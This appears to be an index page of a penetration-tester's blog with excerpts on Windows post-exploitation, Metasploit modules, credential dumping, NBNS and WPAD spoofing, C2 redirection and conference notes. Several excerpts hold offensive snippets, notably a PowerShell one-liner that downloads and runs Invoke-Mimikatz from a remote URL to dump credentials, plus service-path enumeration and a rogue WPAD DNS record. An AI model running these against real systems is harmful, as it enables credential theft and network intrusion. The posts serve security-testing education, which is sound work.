Room362

Blatherings of a security addict

Support Me

Ever have one of those topics that you know you’ve looked up 100 times but never can remember the answer?
I was having one of those moments in a recent conversation on the NoVA Hackers mailing list (If you want to join please read the instructions before requesting to join)
The question came up as to what effect “Password Required: No” means in a net user UserName is.
As usual, MSDN isn’t very helpful:

With all of the scanning / noise on the Internet, it’s nice to get rid of a large chunk of it simply by blocking an entire country’s worth of IP space. To do that you can simply use a kernel module for iptables called “xtables-addons”. On Debian/Ubuntu it’s pretty easy to get going, just apt-get install the needed perl library and the addons themselves:
apt-get install libtext-csv-xs-perl xtables-addons-common !Warning: This does require proper linux headers to be available to compile the kernel module.

First off, this is dead simple and shouldn’t work, but it does. Also, there is no possible way that I’m the first one that has identified this, but here it is (trust me, I tested it so many ways to confirm it because I couldn’t believe it was true)
TL;DR USB Ethernet + DHCP + Responder == Creds
Thesis: If I plug in a device that masquerades as a USB Ethernet adapter and has a computer on the other end, can I capture credentials from a system, even when locked out (yes, logged in, just locked).

Created the 2016 UNOFFICIAL DerbyCon Hiring List. To get on the list is even easier now! Just complete the following form: https://goo.gl/forms/LW5b1xo4O9D8eVZU2
(One small tip, first come first serve, so if you want to be on the top of the list it’s best to submit the best info you have vs waiting on anyone, I don’t change the list order for anyone.)
Direct Link to Google Doc: https://docs.google.com/spreadsheets/d/1qlJYhdxljG4f1vHhj5-Vyj5wiRb3YBjQJU4Cqh2cT6k/edit?usp=sharing

Each year I make up a list the week before Blackhat and Def Con of talks that I “can’t miss” and some that I want to see (and use it for video watching afterwards for those I missed). This year I thought I would share that list here. I will be breaking them down by each day of the events by time slot. Any talk I have a 🌟 by, is a “Must see” for me.

I recently asked a friend if I could have just a list of the domains in the LinkedIn dump, no passwords, not full emails, just domains. I run a program that I lovingly call “DeepMagic” and I feed it domains whenever I can. Well, this time when I tossed the list of domains into the engine it started spitting out tons of errors. There was a total of 9,436,804 unique domains names in the list, and for anyone who works with DNS that isn’t a very big number, so I didn’t think very much of it and didn’t know why it would choke on a list that small.

Recently saw a link to an SCF file. Didn’t know what those were so I went digging. Turns out they are a simple text based file that controls Windows Explorer. ;-)
Here are the examples I found via the references:
Open Explorer
[Shell] Command = 2 IconFile = explorer.exe, 1 [Taskbar] Command = Explorer Open “Channels” page in IE:
[Shell] Command=3 IconFile=shdocvw.dll,-118 [IE] Command=Channels This didn’t work for me at all, probably because Internet Explorer doesn’t have “Channels” anymore.

Mostly just writing this so I can keep notes.
Today I came up with the idea to forcibly put the WPAD entry into a Windows Domain’s DNS. For those who don’t know what this would do there is an entire Wikipedia article on the subject: https://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol
I did this via PowerShell pretty easily on one of the domain controllers like so:
PS C:\> Add-DnsServerResourceRecordA -Name wpad -ZoneName sittingduck.info -IPv4Address 107.

Previous works: There has been a number of different blog posts, presentations and projects that have happened before this post and I will reference a number of them during the post and at the end have a link to all that I know about. If you know of any works on this subject that I am missing please submit a comment below and I’ll will be sure to reference it.

Previous works: There has been a number of different blog posts, presentations and projects that have happened before this post and I will reference a number of them during the post and at the end have a link to all that I know about. If you know of any works on this subject that I am missing please submit a comment below and I’ll will be sure to reference it.

Previous works: There has been a number of differnet blog posts, presentations and projects that have happened before this post and I will reference a number of them during the post and at the end have a link to all that I know about. If you know of any works on this subject that I am missing please submit a comment below and I’ll will be sure to reference it.

Metasploit Minute Season 6 is on the air! I know we have been away for a long while. The first episode is posted https://www.patreon.com/posts/5083466 each Monday a link will be posted on the Patreon site, or if you find RSS feeds easier, you can find it over at http://metasploitminute.com

Yes yes yes, I know, another platform, but guess what, it’s my blog, so ne-ner-ne-ner-ne-ner
Hugo removed what I didn’t like about Octopress (the generating / pushing of content using a mix of branches and such)
The reason I moved from Blogger was I just can’t stand having to log in and be online to make posts. I love things like MarsEdit for doing offline posts to services like Blogger, but I never could get the formatting right when I was done, especiall for code, so I’m back to a markdown based system.

Created the 2016 UNOFFICIAL ShmooCon Hiring List. To get on the list is even easier now! Just complete the following form: http://goo.gl/forms/pbYI0TZ9dG
(One small tip, first come first serve, so if you want to be on the top of the list it’s best to submit the best info you have vs waiting on anyone, I don’t change the list order for anyone.)
Direct Link to Google Doc: https://docs.google.com/spreadsheets/d/15xqphPVEnH7o2urovHWjJiS1VCjdAqcPNB_HS0yRexU/

Ever want to have all of your C2 go to the same box, have the functionality of Meterpreter, and Empire, while making it so if anyone goes to the actual site of your C2 all they get is something like Google?
Nginx makes that possible, and instead of making a blog post that will disappear, I’ll point you at my combo in my “Attacker Knowledge Base” site:
https://attackerkb.com/Combinations/ReverseProxyAttackTools
and instead, show you the results once it’s setup:

Hi. I’m Rob… and I have a problem. Lets just say, when you find the limitations on Amazon’s wishlist features for single items, you know you have a problem. My problem? I’m kinda addicted to Intel NUCs. They are so versitle, low-ish power consumption, and incredibly powerful and TINY. I carry 3 of these (the older / cheaper ones) around to run my trainings / classes from.
The follow is my current wishlist.

Meterpreter’s STDAPI extension (the one that always gets loaded) has a new command. This doesn’t happen very often so it’s worth noting.
The new command prints out the currently attached “mounts”. In windows world, that means the normal CD ROM, C drive, etc, but it also means all of the mounted network drives as well.
This gets very interesting when you happen to find yourself in a VM environment where you can start writing files to the host:

Time is a one-time non-renewable precious resource you are given. It is ok to be greedy, selective, and even snobbish about how, and with whom you spend it.
If it helps, think of your time as a vault, money is withdrawn at a constant rate by people as you spend it, but you are not allowed to look inside to see how much you have left. It could be a billion dollars, it could be .

I recently took the plunge and joined a startup called R5 Industries. I wanted to say thanks for all the well wishes that I received on social media. It has certainly calmed my nerves about the choice ;-).
I’ve had a number of people ask what R5 Industries does. Our primary selling point is AntigenC2, which is a really Command and Control detection product (no agents). But we also do Red Team assessments and some other fun toys if you are interested, contact@r5industries.

One of the best resources for persistence mechanisms is Hexacorn’s blog. http://www.hexacorn.com/blog/category/autostart-persistence/
If you haven’t checked out his “Beyond good ol’ Run key” (linked above) 32 post series, you really should. But today I wanted to talk about one that I didn’t see up there:
DNVM (https://github.com/aspnet/dnvm) is the DotNet Version Manager and it’s a part of ASP.NET 5, which I believe has been inside of Visual Studio since the 2013 version.

If you found this post via a search, you are probably like me, “not great” at keeping your desktop clear “stuff” (you probably have a ‘stuff’ folder you once put stuff in and forgot about).
If you are, and you go into a presentation, you probably don’t want to have all of your icons visible (and possibly recorded). Hiding your desktop icons on Windows (since 7 I believe) is pretty simple.

Today I was asked by @Krystropolis for a “Hello” and maybe some hacking advice, see tweet:
@mubix I have my class in 4 hours. Would you be willing to post a 'hello' and maybe some hacking advice for my class demo? #PSUBehrend #CTF
— Krystal Elliott (@krystropolis) September 24, 2015 I thought about it on my entire 1 hour drive home from just turning in my badge and laptop from a big corporation to go work at a start up.

AKA - ROB WRITES POWERSHELL!!
Yesterday I posted a way to dump hashes using a Domain Controller account. But how do you know which account to use? And when was it’s password last set? net user unfortunately won’t do computer accounts.
So I decided to write a PowerShell script to find out. Unfortunately Windows 7 doesn’t come with the ActiveDirectory PowerShell module (I’m sure there is another way to do this but here is how I did it.

Since I follow both Carlos Perez and Benjamin Delpy on Twitter, something caught my eye on August 2nd, soon after Benjamin Delpy drops DCSync:
@Carlos_Perez haha, if yes, it will be a 0d ;)
No, like always it needs some rights ;) DA is cool, maybe DC$ is enough
— Benjamin Delpy (@gentilkiwi) August 2, 2015 And then later on August 28th, again about the DC$ account (Domain Controller computer account):

It’s often tough from both hiring and job hunters to find one another at conferences. I think this is mostly because of a couple things.
No one wants to stand at a booth on either side and talk job stuff in front of a bunch of people and people at booths rarely get the chance to get away. It’s hard to know “who” to talk to. So I created a very simple Google doc to help put twitter handles and links together for people who are job hunting and people who are hiring to kinda get to know who to talk to.

The teflon crew at Pied Piper suffered quite a bit during Season 2 of SILICON VALLEY. But there was no greater indignity than being brought to their knees by a tequila bottle.
Since episode eight “White Hat/Black Hat” aired, many skeptical viewers have asked: how could something like this happen?
Could a mindless error of pressing a delete key really cause a venerable company like Intersite to lose over nine thousand hours of content (including an irreplaceable archive of vintage yiffing videos)?

I’ve had my fare share of “trying new things” after SquareSpace. I tried Ghost, Octopress, Wordpress, and about 30 others in between. All the blogging platforms I tried had some major issues that I didn’t like. I’m sure at some point I’ll write about them but this post is mostly just to announce I finally have given up the fight for finding the perfect blogging platform and I’m just going to blog on Blogger from now on.

A while back I needed to set up a pfSense box for CTF/example stuff that didn’t and wouldn’t ever have Internet connectivity. Doesn’t seem like much of a task right? Just pop it in and go. Problem is that you loose the use of the packages that help make pfSense so awesome.
Once I figured it out at that time, I made a Forum post so that anyone running into the same issue wouldn’t have to struggle as much:

It’s often tough from both hiring and job hunters to find one another at conferences. I think this is mostly because of a couple things.
No one wants to stand at a booth on either side and talk job stuff in front of a bunch of people and people at booths rarely get the chance to get away. It’s hard to know “who” to talk to. So I created a very simple Google doc to help put twitter handles and links together for people who are job hunting and people who are hiring to kinda get to know who to talk to.

Metasploit Minute has entered into it’s 3rd “season”. And we kick it off with using the Metasploit capture modules to capture creds from this powershell popup. The cool thing about this is you can leave it to execute on a system without any other code on disk and get creds constantly as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free.. over SSL.

Update: I originally posted this to the Full Disclosure mailing list but for some reason it wasn’t accepted via the moderator so I’m posting it here. First, so that the information does get out there, and second to see if anyone knows why it may have been rejected.
I was helping out a family member with their computer when it came up that they “already had remote help software” (SingleClickConnect or SCC), when I asked what this was, the family member said it was installed by Dell Support when trying to fix their issue.

As I learn more and more about OSX I find things that surprise me. For instance, in this post I will be showing you how to, with root or sudo priviledge, enable the built-in apache server on OSX and it’s PHP module….
I am working with OSX Mavericks so your locations may vary based on the version of OSX your target it.
First things first is to enable the PHP module for the Apache server.

One of the problems with using PSEXEC from Metasploit (any of the psexec modules) is that it runs as SYSTEM. What’s the problem with that? Isn’t SYSTEM god mode? Ya, and normally I’d agree that it’s the best level to have, but the defenses these days have gotten better, and getting direct connections out is pretty rare. That leaves proxies, and as you know SYSTEM doesn’t get any proxy settings.

Anyone who knows me knows that I live in a tiny world of offensive security, so much so that I miss large world events entirely. (Like elections and hurricanes)
I didn’t know Aaron Swartz, or even 1% of what he was doing in the world to make it a better place and for that I am ashamed. I will do better, to look around, see what needs to be changed in this world and make it a reality.

Let me start off by saying this post is easy for me to write in one facet as I’ve never been a heavy drinker or much enjoyed the taste of alcohol. So if you need a reason to disregard what I say next, I leave the door open.
I am still pretty much a runt in the infosec community as I didn’t even begin learning computers (outside of playing games on them) until 2005.

Keeping it here for notes and just in case anyone else runs into this same issue.
brew install pip sudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future pip install pycrypto If you have a better way please leave a comment below!

SMB Relay has been around for a long while. I even have a post about using it along with LNK files here:
MS08-068 + MS10-046 = Fun until 2018
Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which is not always easy to crack) or assume administrative access (because they attempt to PSEXEC with the incoming session). Well, since MS08-068 thats much harder to pin down.

This is my box. There are many like it, but they are all mine.
My malware is my best friend. It is my life. I must master it as I must master my life.
My malware, without me, is useless. Without my malware, I am useless. I must drop my malware true. I must rootkit better than my enemy who is trying to kill my binary. I must kit him before he kits me.

So there was this blog post that talking about a number of ways to dump windows credentials by @lanjelot [definitly someone to follow] - here: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ and at the very bottom of this post it says “AD Replication (EXPERIMENTAL)“
What it boils down to is if you can position a system that can do DNS resolution to the target domain, and perform some other UDP traffic, you can fake join a samba server you control to a domain and it doesn’t require code execution in any way on the domain controller.

PSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all “psexec” tools work is:
(Optional) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal’s tool) to the ADMIN$ share Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.

Everyone has their list of hostnames they brute force domains with. In my last post I even mentioned a few ways to use one with XARGS or PARALLEL. But one fact about wordlist brute forcing is that there is no “one list to rule them all”. But over the years of doing DNS record collection I have noticed one thing, most domains have a large number of short hostnames that are easy to remember, usually 4 characters or less.

Quick update: As @MikeDamm points out, xargs has a -P option that can do the same thing I’m using parallel for. If you have a supported version of xargs you can use -P 0 to do the same thing as -j0 with parallel, but if your version doesn’t support the 0 you can simply use the same number parallel uses ala:
cat subdomains.txt | xargs -P 122 -I subdomain dig +noall subdomain.

Guest post by @infosecsmith2 There was a recent presentation at DerbyCon, entitled:
Living Off the Land: A Minimalist’s Guide to Windows Post-Exploitation by Christopher Campbell & Matthew Graeber
I highly recommend that you start with this presentation as it lays the foundation for this post.
The premise is, how can we maintain persistence in a corporate environment, using tools and defaults provided by the host OS we have compromised. This is a very important concept, given the shift in many organizations to an Application Whitelisting Defense model.

Since I’ve been gone, OJ has released the ExtAPI (Extended API) for Meterpreter. This has some pretty amazing functionality. You can find OJ’s write up on it and more amazing things he did in 3 months of meterpreter and on the Metasploit blog.
Just brushing the surface and to help people see the power of this new functionality I went ahead and created a few Meterpreter scripts that can really mess with someone.

I’ve taken a rather long hiatus from blogging. This is mostly because I was fed up with the blogging platform that I had (Squarespace) and didn’t really have any alternatives that met all of the features I wanted.
So, where am I at now? Github actually. Github allows users to create “Github Pages” for repositories (or be it’s own repo). For the most part these pages are written in Markdown. It’s late and I don’t feel like looking up who, but someone created a project called “Jekyll” which is a Ruby based static page generator and then another project called “Octopress” popped up using Jekyll to create a static html based blogging platform.

clymb3r recently posted a script called “Invoke-Mimikatz.ps1” basically what this does is reflectively injects mimikatz into memory, calls for all the logonPasswords and exits. It even checks the targets architecture (x86/x64) first and injects the correct DLL.
You can very easily use this script directly from an admin command prompt as so:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" (This works REALLY well for Citrix and Kiosk scenarios and it’s too hard to type/remember) This runs the powershell script by directly pulling it from Github and executing it “in memory” on your system.

cross posted from: http://carnal0wnage.attackresearch.com/2013/10/ad-zone-transfers-as-user.html
The tired and true method for Zone Transfers are using either nslookup:
nslookup ls -d domain.com.local Or dig:
dig -t AXFR domain.com.local @ns1.domain.com.local In the Windows Enterprise world there are a few more options. If you are a DNS Admin you can use the ‘dnscmd’ command like so:
dnscmd /EnumZones dnscmd /ZonePrint domain.com.local Which is handy if you can pop the DNS server (usually the Domain Controller so you usually have better things to do at that point).

Password Filters [0].aspx”) are a way for organizations and governments to enforce stricter password requirements on Windows Accounts than those available by default in Active Directory Group Policy. It is also fairly documented on how to Install and Register Password Filters [1]. Basically what it boils down to is updating a registry key here: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
with the name of a DLL (without the extension) that you place in Windows\System32

If you’ve ever used proxychains to push things through Meterpreter, one of the most annoying things is its “hardcoded” DNS setting for 4.2.2.2, if the org that you are going after doesn’t allow this out of their network, or if you are trying to resolve an internal asset, you’re SOL. After a ton of googling and annoyed head slams into walls every time I forget where this is I’ve finally decided to make a note of it.

Saw this post about a kernel bug in 64 bit Windows that is a DoS, it can also create an unkillable process: Blog post: http://waleedassar.blogspot.com/2013/02/kernel-bug-1-processiopriority.html
Figured I’d take a swing at making a module that I could put Meterpreter into an unkillable state. Good times at CCDC could be had.
Started with the C code for the bug: http://pastebin.com/QejGQXib along with the only resource I could find about the actual function: http://processhacker.

Problems are that everyone does this whole blogging thing in so many different ways. Me, personally? I like to have a client that I can save drafts it, work on things a little bit here and there and then finalize stuff when I’m ready to post. I have a couple dozen of these posts ready and set with final tweaks needed but my blogging software Squarespace up and moved on to “Squarespace 6”.

This and part 2 are mostly just an update to http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html but without the need for VSSOwn, that and we are doing it remotely without the need for shell on the DC.
Ever run into a Domain Controller that wasn’t allowed to talk to the Internet, had insane AV and GPOs not allowing anyone to RDP in (Even Domain Admins) unless they provided some kind of voodo happy dance?

Mimikatz is now built into Metasploit’s meterpreter, you can do load mimikatz from the meterpreter prompt, but if you don’t want to go through the hassle of dealing with AV, reverse or bind payloads, meterpreter binaries, and you have clear text credentials for an admin, you can just use Mimikatz’s alpha release that allows you to run Mimikatz on your machine against a process memory dump of LSASS. The great thing about this technique is that the only thing on disk is a Microsoft tool.

This is how I did it:
for /f "tokens=5 delims=" %A in ('reg query HKLM\SYSTEM\CurrentControlSet\Services') do sc qc %A
Let me know if you know of a better way.
If you don’t know why this could be important read here:
http://www.ihtb.org/security/program.exe-privilege_escalation.txt
If you are on a Win7 box or otherwise have the option to use WMI you can use the following command: wmic service get pathname

Mimikatz is awesome right, so is WCE. But both have one fatal flaw, even though you can execute them in memory {link} - you still have to have the binaries, remember the command to execute it in memory, and ultimately transfer the entire binary over so that metasploit can do its thing.
Then along came SessionDump. I only noticed this because someone was tweeting congratulations to someone on writing it:

Just a quick post to say that egypt and I will be giving Metasploit Mastery twice (2 x 2 day sessions) at BlackHat USA 2013. Come out and get your Metasploit on in Vegas w/ us
Linky: http://www.blackhat.com/us-13/training/metasploit-mastery.html
Current fill rate of July 27-28 session: Current fill rate of July 29-30 session: EOM

This is one of those stupid simple things that are easy to forget so I’m posting it here. Wordlists and dictionaries are awesome for cracking password hashes, and although, thanks to things like Mimikatz and WCE I don’t have to, but there is times where it’s important.
Now, having John, Hashcat, or Cain go through a dictionary is a 1-for-1 hit, no time wasted no matter how it’s sorted and usually is best to sort them by most common first so you get earlier hits.

You’ve found an NFS share on a pentest, it’s sharing out your target’s home directories (/home) and some SAN with all of the Windows AD users “home” directories under /volumes/users/. You only have a meterpreter session though… enough back story, problem is that Metasploit doesn’t really have any auxiliary modules or otherwise to access the things on those shares. Please correct me if I’m wrong, but there also aren’t any tools for talking to NFS shares over TCP only proxies.

It seems like every week there is a new compromise of some service or another. But as a user what are you supposed to do with this knowledge? Here are some suggestions on things to do or think about when reacting:
Do you use the password you use there anywhere else? Think about starting to use a password manager like LastPass, 1Password, KeePass, or a product like Yubico. This way you can very easily use different passwords for different sites.

The following has been a concept for me for a long time and recently I tweeted the idea which really put me under the fire to prove it. (re: justanidea hashtag)
And a few people came up with some very valid points:
1) Doesn’t work so well with HTTPS sites
He’s right, but that forces the attack to use SSL, and doing so can yield the defender more information about the attacker, and offer other avenues of defense.

This is here because I always forget how to do it
sudo apt-get install libtirpc-dev libncurses-dev wget http://www.cs.vu.nl/pub/leendert/nfsshell.tar.gz tar zxvf nfsshell.tar.gz cd nfs ln -s /usr/include/tirpc/rpc/clnt_soc.h /usr/include/rpc/clnt_soc.h perl -p -i.orig -e 's/getline/getline_nfs/' nfs.c Next part I don’t have a good way to automate. You need to go in and comment out (w/ #) the 4 lines following “uncomment the following 4 lines for Solaris 2.x” and uncomment the 2 lines following “For GNU readline support you need to add”

Thanks to @spatial_d for the tweet here: https://twitter.com/spatial_d/status/302253050725298176
I’m capturing it here more of a bookmark for myself:
Build It: http://www.ustream.tv/channel/build-it-2013 Belay It: http://www.ustream.tv/channel/belay-it-2013 Bring It On: http://www.ustream.tv/channel/bring-it-2013

In 2012 @egypt and I taught Metasploit Mastery for a day and a half @DerbyCon . This was a lot of fun but we had to cram a TON of slides into that short period of time. PLUS we had a CTF at the end where people had to break into a corporate network (virtualized) and sell their shells, data, passwords, or flags to us (egypt and I were acting as opposing countries).

I made a slide deck to kind of explain my latest project. Basically I got fed up with having dictionaries, passwords, and cracking tools but no way to really do better collaboration in a team format as well as just better management for myself. Please feel free to submit pull requests, issues if you think something is broken or want features, or whatever on the Github repo here:
https://github.com/mubix/WhiteChapel/
Here is the slide deck:

Drink!!
So I’ve been working on a training package that takes a bit of a different approach than what I’ve normally done. The training breaks down like this:
Day 1: Local LAN based exploit (Windows) Day 2: Remote Web based exploit (Linux) Day 3: Client side exploit (Windows) Day 4: Local exploit (FreeBSD) Day 5: Network of the Seven Bells Test Each day (save for the 5th) will focus on a single exploit, explaining it, running it on virtual machines, and spending 8 hours diving into as many detectable changes that exploit makes on a system.

Not very security related, but something I don’t want to forget how to do. It was a PITA. So I had a old WINDOWS directory that I needed to get rid of. And the following commands gave me the ooomph needed to get the job done.
1) Get a SYSTEM shell so all modding of permissions will be good.
psexec /accepteula -i -s cmd
2) Grant Administrators FULL rights to the directory and all sub directories and files

Let me say first off that this isn’t the most elegant of ways to accomplish it. It is in the “it works for me” stage.
A quick primer on EXE::Custom: This is a setting just like RHOST in Metasploit wherever an EXE is built for Windows payloads. Such as PSEXEC, BypassUAC, etc. It tells Metasploit to ignore all of your payload settings and just use the EXE you have specified. Now this does come at a bit of a cost.

Looking through network shares can be slow, and waiting for individual searches to finish looking through the whole “drive” is redundant. Easier to just use some Windows voodoo to get a good list to look through offline:
start /b cmd /c dir /b /s \\nas\users_home_share$ ^> shareinfo.txt Breaking that down:
start /b - starts a process that won’t hang up our current one, with the “b” flag meaning “background”, yay not visible to the user!

You’ve got shell, and a set of credentials but you’re coming up empty on what you can do with those credentials. This is especially problematic when you can’t get past UAC as you are either in a AlwaysNotify situation or not a local admin.
(I’m not trying to pull some some “insert magic here” on the assumption of credentials just at the time of this writing I have only just started working (created a blank file) on a post module to do this as your current user, so until then, you need credentials)

Dave Kennedy and Kevin Mitnick submitted the “bypassuac” post module to Metasploit a while back (last DerbyCon?). Which is awesome and they did some fantastic work, but I had a few complaints as probably anyone did who used the module on a somewhat modern network.
“Old” module post/windows/escalate/bypassuac:
I decided to give it a bit of a face lift:
“New” local exploit module exploit/windows/local/bypassuac:
All of the credit for the availability of this module goes to @egyp7 though, without his epic addition of local exploits to Metasploit the majority of the updates to this module wouldn’t be possible.

Since I didn’t see any documentation bringing how to take an LM hash that you’ve cracked and convert it to the NTLM equivalent all in one place. And I google how to do it almost every time. I wanted to put all these links in one place and remember how to do it for john. Go-go-gadget blog-notes.
So there is this: https://github.com/snarez/rcracki/blob/master/lm2ntlm.cpp
And this: https://github.com/rapid7/metasploit-framework/blob/master/tools/lm2ntcrack.rb
And this: http://www.securityfocus.com/tools/6696
And the edited version of the above: http://atenlabs.

TL;DR – DNSSEC Walker traverses a domain’s DNSSEC records to locate it’s regular DNS records.
I like to go through slides of cons I can’t make it out to, and Hack-in-the-Box (HITB) Kul (Malaysia), was one such as they were very quick to release sides:
http://conference.hitb.org/hitbsecconf2011kul/materials/
One that I came across is Marc “van Hauser” Heuse’s talk on IPv6 titled “IPv6 Insecurity Revolutions” (Link directly to PDF on aforementioned materials link).

One of the great things about the reverse_http(s) payloads is that it is proxy aware. However one of the pitfalls to this is that SYSTEM doesn’t have proxy settings, nor do users who have never logged into a system (unless profile loading is triggered). The problem here arrises when you are trying to do anything as SYSTEM, also the PSEXEC only has the option of getting you a SYSTEM shell (so you’re done for right out of the door)

Ok, this is pretty straight forward no magic:
Got a shell, doesn’t have to be SYSTEM
Add a route to the internal range or directly to the host you want over the session you want
Mosy on over to the Socks4a module. And in another terminal we need to make sure our proxychains.conf file in /etc/ or where ever you store your conf is correct. It defaults to 9050 on 127.

UPDATE: THIS IS ONLY WORKS WITH THE LOCAL ADMIN (ID 500) ACCOUNT AND PASSWORD
(MY MISTAKE FOR NOT TESTING MORE)
So the “-ish” is you need to have the username and pass of another account that has administrator rights the local administrator account on that box. But other than that, the following image should speak for itself. (no UAC prompt occurred during the following actions)
I plan on writing a Metasploit module to do this as all it really does is starts a process as a different user and that process executes ShellExecute’s ‘RunAs’ verb.

I read this article a while back:
http://fuzzynop.blogspot.com/2012/09/pass-hash-without-metasploit.html
by @FuzzyNop
Great article showing the use of WCE’s “-s” flag to Pass-The-Hash locally and I highly recommend checking it out. Anywho, I was once in a similar scenario, where I had no Metasploit to back me up, but the box I was on did have one interesting thing, ruby and an accessible target for relatively up-to-date ruby gems. Since Metasploit’s powerhouse library ‘rex’ installed just fine I was set.

If you follow the exact same steps you did for Netview: /blog/2012/10/07/compiling-and-release-of-netview/
then you already have the steps needed to create a compiled version of ditto from the repo here:
https://github.com/mubix/ditto
And while the sheep icon is cute, and a nod to what ditto does, it comes at a pretty hefty cost:
Size. Now if you’re scoffing at 408 KB then you don’t have any issues, but I like not having to wait while a binary I am trying to push to a victim box is transferring.

If you haven’t caught Chris Gates (@carnal0wnage) and my talk at DerbyCon 2012 - we released 2 tools, Netview, and Ditto. Here I’ll walk you through compiling Netview yourself, in the next blog post we’ll go over compiling Ditto and how you can remove it’s icon to reduce the size if you want. But for Netview it’s pretty straight forward. First you pull a copy of the GIT repository:
https://github.com/mubix/netview

pfSense is an excellent free way of including a firewall / ids / proxy in your lab or VMs. It runs small and fast, but even as simple as pfsense is sometimes you need a bit less complexity and speed of configuration.
Enter Peerblock and AnalogX’s proxy. Two free tools, one usually used to stop people who torrent from getting caught by the RIAA/MPAA and the other a drop dead simple windows based proxy utility.

Once you’re done staring at the Star Trek deity above (it’s a staring contest you will loose since you a such a simplistic race). I pull your attention to: https://github.com/mubix/q
This repository / exploit pack was created for the sole purpose to house modules, scripts and resource files that would otherwise not be accepted into the Metasploit trunk. It will always be free and anyone is free to submit pulls of modules, scripts or resource files that they created or just found and were not accepted to the trunk because it was just a script, it violates TOS of a service, they did not author it, or any other possible reason.

Executing WCE.exe in memory as demoed by Egypt here: https://community.rapid7.com/community/metasploit/blog/2012/05/08/eternal-sunshine-of-the-spotless-ram has two issues with it. 1, you leave a file on disk with your hashes and clear text passwords. That just won’t do. 2. There is this DLL called WCEAUX.dll that gets written for the briefest second to disk:
(yes I realize I’m running this on disk ‘wce32.exe’, but it exhibits the same DLL drop when doing in-memory)
Now, don’t get me wrong, I love WCE, and Hernan Ochoa does an amazing job with it, but when it comes down to it, it’s the best tool for the job.

So it turns out that Windows Firewall talks IP addresses just like any other firewall, so if you configure FakeNetBIOSNS to tell everyone that the IP address for whatever they looked up is YOUR IP, guess what, no need to bypass the spoof filters ;-) Happy Rob!
$ cat nbns.ini PROJECTMENTOR WPAD 172.16.10.207 PROJECTMENTOR FILESHARE 173.26.10.207 Results in:
Game ON!

One of pen testers favorite attacks is NBNS spoofing. Now Wesley who I originally learned this attack from, traced this back to sid (http://www.notsosecure.com/folder2/2007/03/14/abusing-tcpip-name-resolution-in-windows-to-carry-out-phishing-attacks/) . Wesley’s stuff can be found here: http://www.mcgrewsecurity.com/tools/nbnspoof/
Wesley’s stuff eventually lead to this awesome post on the Packetstan blog: http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
and in that post the Metasploit module to do it all is demoed. But there in lies the rub. With each degree of separation we have more and more solidified in into a “on-site” only attack.

Watching Egypt’s talk at DEFCON 20 he mentioned the ability to jump on on a system when pageant (puTTY’s ssh-agent equivalent) is running. So I wanted to figure out the best way to get this going. Here is what I came up with:
meterpreter > run enum_putty [*] Putty Installed for [["Administrator"]] [*] Saved SSH Server Public Keys: [*] rsa2@22:172.16.10.150 [*] Session corp_webserver: [*] Protocol: SSH [*] Hostname: 172.16.10.150 [*] Username: root [*] Public Key: meterpreter > Awesome, this guy runs as root and we have the IP address.

In the previous post: http://www.room362.com/blog/2012/8/11/let-me-out-of-your-net-workndashintro.html I told you about letmeoutofyour.net, but how does it work?
Things we need to accomplish on the server:
Listen on all ports Answer for all hostnames and subdomains Answer for all HTTP verbs, file and folder requests ONE: Listen on all ports
(I used Linux, so this guide is for such, modifications to other OSs is up to the reader)
First you have to get rid of all other services.

Something that is often useful is a known-good. Something out of the control of your adversary or outside modifiers. But back to that in a sec, egress ‘busting’ or getting your payload/backdoor/trojan/c2 out of someone’s network once you’ve gotten that ever elusive “CODE EXECUTION HAPPY DANCE” going on isn’t always easy. There is even a Metasploit payload for it called ‘allports’:
https://community.rapid7.com/community/metasploit/blog/2009/09/24/forcing-payloads-through-restrictive-firewalls
There is also ‘Egress Buster’ by the guys over at TrustedSec which can do 1000 ports in just a few seconds:

Egypt and I have decided to give away a spot in our training event at DerbyCon. This won’t come easy though, you have to submit an essay to us with one of the following topics:
Essay Topic Options:
1. Why I deserve a free training class
2. How I would social engineer Egypt and Mubix out of a ticket to their class
Maximum Length: ~1000 words / 3 pages. (We’re lazy)

With the use of Mimikatz and WCE, clear text passwords are much more common. What isn’t always there is the user. They take lunches, go home at a reasonable time and generally aren’t really appreciative of our (pentester/red teamer)’s schedule.
A straight forward way, and provided by Microsoft to create a process as a user (whereby having their token readily available is using ‘runas.exe’:
w00t, we the user is present, we can migrate our meterepreter session into that notepad and we’re good right?

Every so often someone writes a Metasploit Module that is pretty epic. Today is one such day:
Twitter Link: https://twitter.com/webstersprodigy/status/222529916783169536
Which has a link to here: https://github.com/rapid7/metasploit-framework/pull/589
Demo / Example resource files: https://skydrive.live.com/?cid=19794fac33285fd5&resid=19794FAC33285FD5!170&id=19794FAC33285FD5%21170
You can pull the fork w/ branch from here: https://github.com/webstersprodigy/metasploit-framework/tree/module-http-ntlmrelay
And as soon as you do you can start doing this (using the example resource file to put a file, cat it out, enum shares available, list files on a share, then psexec all from a single URL being loaded):

@jabjorkhaug posed the following question on Twitter today:
I figured I could solve this and it would be an interesting challenge. Here is what it gets detected as:
The service binary that is used as part of PSEXEC is located here:
MSF Directory/data/templates/src/pe/exe/service/service.c
The important part to look at starts at line 57:
#define WIN32_LEAN_AND_MEAN #include <windows.h> #define PAYLOAD_SIZE 8192 char cServiceName[32] = "SERVICENAME"; char bPayload[PAYLOAD_SIZE] = "PAYLOAD:"; SERVICE_STATUS ss; SERVICE_STATUS_HANDLE hStatus = NULL; /* * */ BOOL ServiceHandler( DWORD dwControl ) { if( dwControl == SERVICE_CONTROL_STOP || dwControl == SERVICE_CONTROL_SHUTDOWN ) { ss.

Everyone does things differently, and explaining what goes through an attackers head when they get a shell is virtually impossible and even more so to generalize into a methodology, but I’ve tried to do that with the “3 ‘P’s of Post Exploitation” and they are in a certain order for a reason but certainly up to circumstance to what order is best.
